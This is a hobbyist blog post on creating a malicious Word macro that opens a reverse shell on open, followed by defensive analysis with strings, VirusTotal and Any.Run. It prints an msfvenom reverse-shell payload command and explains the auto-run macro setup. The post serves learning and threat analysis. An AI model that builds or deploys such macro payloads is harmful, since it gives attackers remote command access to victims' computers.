Malicious office macro analysis

In this blog post, we will creating a malicious macro that allows us to catch a reverse shell when a word document is opened. We will then be analysing the word document using various tools and sandboxes and performing some threat intelligence.

Just something I enjoyed learning about! :)

Image source from Kapersky.

Generate the malicious Macro.

We need to open MS Word and head over to the View tab> Macros>Create. This will open another window where we will be able to script our macro in VBA.

Before we are able to create our macro, we need to generate our payload which will be included in the macro. We can use the following command to generate a base64 encoded Powershell reverse shell payload.

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f hta-psh

Our payload that we want to copy starts from the command "powershell.exe -nop -w hidden...". The only issue is that in office macros, VBA has a character limit for literal strings of 250 characters. We therefore need to split our reverse shell payload into multiple strings and concatenate them using the following python script.

The output of the python script is shown below, we can copy this output and paste it into our Macro.

Because Office Macros are not executed automatically, we need to add two pre-defined procedures to our macro template. The first will be AutoOpen() which will auto open and run our macro when the document is opened and Document_Open() which will run a macro when an already opened document is reopened. Both procedures will call our custom procedure and will run our code. The below shows our completed Macro and with the procedures that will call our custom procedure and execute our code.

In order for macros to be supported and executed we need to save the document in either the docm or doc format that supports embedded macros, the docx format however does not support them. We save the document as a word 97-2003 document so that embedded macros are supported.

When we re-open this document, we must click on 'Enable Content' so that the macro can execute.

Immediately after clicking on 'Enable Content' we receive a reverse shell from the computer that opened the document. This means, we (the attacker) now have command line (cmd) access to the victims own computer (whom opened the document). This demonstrates why it is so important to vet any documents you receive and not open any that come from untrusted or suspicious sources.

Analysis using Strings.

At this point we have created a malicious macro that executes when the document is opened and allows us to catch a reverse shell on the machine that opened it. Now its time to play defender and do some analysis on this document. We can run a tool called 'strings' on the file. The strings command, essentially extracts any text or 'strings' inside a binary or file we run the command on, it should be able to extract and show us any VBA code we have embedded in the word document such as our macro.

We will be using a web application called CyberChef which includes the Strings tool and allows us to analyse a file in our browser. Below when the strings tools is run on our document, we see it has extracted some strings which look familiar to us; "Document_Open", "AutoOpen" and "MyMacro" which was our custom procedure.

Looking deeper, we actually find our encoded reverse shell payload. If we were analysing this word document for IOC's (indicators of compromise) and we saw "Wscript.Shell" and then "powershell.exe" and an encoded payload, this would be a massive red flag.

Analysis with VirusTotal.

In order to confirm if this document is actually malicious, if we could not see anything suspicious from the Strings output, we could run the document through VirusTotal. We see that 31 out of 61 anti virus engines flagged the document as malicious and detected it, most of the engines correctly classify the document as containing PowerShell or as a document with malicious macros.

Sandboxing with Any.Run.

Any.Run is an interactive online malware analysis platform for static and dynamic malware analysis, we can run our document in the sandbox and monitor any processes that are created, network activity, threats detected and see what IOC's are picked up on. We can see below that once the document was opened, malicious activity was detected and a number of processes were created which we will take a deeper look into.

When we click on the IOC tab, we are presented with some (hashes) signatures that identify and characterize this malicious file and its behaviour.

When we copy the SHA256 hash for example and paste it in VirusTotal, we see again that 31/61 anti virus engines classify this hash as being malicious.

Taking a deeper look at Any.Run, we see that the sandbox observed that the word document started a CMD.exe process to execute our PowerShell payload.

Below is a breakdown of the processes spawned by our document. It seems as if our PowerShell payload starts a process (PID 2589) and is then decoded in PID 2368, then in PID 2656 CMD.exe is started to execute our PowerShell payload.

A nice thing about Any.Run is that it provides us with some nice graphs, below is a process graph for the document run in the sandbox. This graphically represents the above and displays the flow of processes from the document being opened to the final process CMD.exe that was used to execute our PowerShell payload.

Another useful graph for threat intelligence is a Mitre Att&ck graph to show us the tactics and techniques employed by the word document. This better helps Cyber defenders understand how threat actors are evolving to allow us to defend against new threat actor techniques.

We have now completed a very quick and simple generation of a malicious macro and some very simple, quick and easy to do analysis for indicators of compromise.

I hope I explained this well for anyone wondering how to do some basic analysis using free online tools or anyone that would like to start some very simple threat intelligence. If you have any feedback, I would love to hear it as I want to keep improving. I am still learning about analysis and threat intelligence, and am no where near an expert in this area.. just yet! So just like you, I am still learning and if you spot any mistakes or inaccuracies, please let me know!